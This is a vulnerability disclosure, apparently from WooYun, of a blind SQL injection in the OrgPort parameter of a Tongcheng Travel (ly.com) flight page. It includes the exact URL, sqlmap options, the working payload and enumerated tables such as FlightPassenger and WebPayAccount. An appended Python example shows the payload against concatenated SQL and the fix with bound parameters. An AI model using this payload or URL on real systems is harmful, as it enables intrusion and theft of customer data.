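SQL injection vulnerability on the main site of Suzhou Tongcheng Travel (同程旅游网)
http://www.ly.com/flight/FlightPriceNew.aspx?ajax=GetPageData&OrgPort=CSX&DesPort=&Sort=&CurrPage=2 The orgport parameter is vulnerable to blind injection.
sqlmap, with the database type already known: --dbms="microsoft sql server" --dbs
I saw this report, http://wooyun.org/bugs/wooyun-2010-055900, where the vendor said it was an old page, so I casually checked whether the new page had the same problem, and to my surprise it did.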
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: OrgPort
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ajax=GetPageData&OrgPort=CSX' AND 7808=7808 AND 'rjNw'='rjNw&DesPort=&Sort=&CurrPage=2
---
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database: 'TCFly'
Database: TCFly
[60 tables]
+-----------------------------------------+
| dbo.Air_CabinCode |
| dbo.Air_Craft |
| dbo.Air_News |
| dbo.Air_PortCode |
| dbo.Air_WaysCode |
| dbo.AirportServiceDesk |
| dbo.FlightAirLine |
| dbo.FlightBookerHistory |
| dbo.FlightChangeOrder |
| dbo.FlightChangeOrderDetail |
| dbo.FlightChangeOrderSelfDealLog |
| dbo.FlightCnBus |
| dbo.FlightCoupon |
| dbo.FlightDP |
| dbo.FlightDPLog |
| dbo.FlightDelay |
| dbo.FlightETicketNOMonitor |
| dbo.FlightFCAchievement |
| dbo.FlightFCWorkRecord |
| dbo.FlightFDCache |
| dbo.FlightFinanceOverdue |
| dbo.FlightFinanceRefund |
| dbo.FlightFriendlyLink |
| dbo.FlightInsuranceOrder |
| dbo.FlightLineStat |
| dbo.FlightMailRecord |
| dbo.FlightMerchant |
| dbo.FlightMerchantReturnStat |
| dbo.FlightMerchantUrl |
| dbo.FlightMonitorETicketInfo |
| dbo.FlightORAssignHistory |
| dbo.FlightOrder |
| dbo.FlightOrderControlLog |
| dbo.FlightOrderExtend |
| dbo.FlightOrderLog |
| dbo.FlightOrderRouteInfo |
| dbo.FlightPassenger |
| dbo.FlightPicture |
| dbo.FlightPlatformProduct |
| dbo.FlightPortFloor |
| dbo.FlightRejectOrder |
| dbo.FlightRejectRecord |
| dbo.FlightSKCache |
| dbo.FlightSPOrderRelation |
| dbo.FlightSelfOrder |
| dbo.FlightSpecialPrice |
| dbo.FlightSystemUser |
| dbo.FlightTime |
| dbo.Flight_Wap_Mypassenger |
| dbo.Flight_Wap_Order |
| dbo.IdGenerator |
| dbo.MSreplication_objects |
| dbo.MSreplication_subscriptions |
| dbo.MSsavedforeignkeycolumns |
| dbo.MSsavedforeignkeyextendedproperties |
| dbo.MSsavedforeignkeys |
| dbo.MSsnapshotdeliveryprogress |
| dbo.MSsubscription_agents |
| dbo.SpecialsTicketCache |
| dbo.WebPayAccount |
+-----------------------------------------+
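Added example, not part of the original report and not the site's code: it shows why the payload listed above is accepted when OrgPort is concatenated into the SQL text, and how a bound parameter plus an allow-list check closes the hole. The table, its rows and the function names are constructed for illustration (SQLite stands in for SQL Server), and the three-uppercase-letter rule assumes the endpoint only ever takes airport codes such as CSX.

```python
import re
import sqlite3

# Payload copied from the sqlmap output on this page (value of OrgPort).
PAGE_PAYLOAD = "CSX' AND 7808=7808 AND 'rjNw'='rjNw"

def make_db():
    # Constructed stand-in for the flight price data; the real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE price (org_port TEXT, des_port TEXT, fare INTEGER)")
    db.executemany("INSERT INTO price VALUES (?, ?, ?)",
                   [("CSX", "PEK", 900), ("CSX", "SHA", 650), ("PEK", "CSX", 880)])
    return db

def query_concatenated(db, org_port):
    # Vulnerable pattern: the value is spliced into the statement, so a quote in
    # OrgPort closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT des_port, fare FROM price WHERE org_port = '" + org_port + "'"
    return db.execute(sql).fetchall()

def query_parameterized(db, org_port):
    # Hardened pattern: the value is bound as data and never parsed as SQL.
    sql = "SELECT des_port, fare FROM price WHERE org_port = ?"
    return db.execute(sql, (org_port,)).fetchall()

AIRPORT_CODE = re.compile(r"[A-Z]{3}")

def valid_port(value):
    # Allow-list check applied before any query runs (assumed input format).
    return AIRPORT_CODE.fullmatch(value) is not None

def compare(db):
    # Summarise how each code path treats the legitimate value and the payload.
    return {
        "concat_clean": query_concatenated(db, "CSX"),
        "concat_payload": query_concatenated(db, PAGE_PAYLOAD),
        "bound_clean": query_parameterized(db, "CSX"),
        "bound_payload": query_parameterized(db, PAGE_PAYLOAD),
        "payload_passes_allow_list": valid_port(PAGE_PAYLOAD),
    }

if __name__ == "__main__":
    for name, result in compare(make_db()).items():
        print(name, result)
```

With concatenation the payload returns the same rows as the plain value CSX, which means the appended condition was evaluated by the database; with the bound parameter the whole string is compared as a literal airport code and matches nothing.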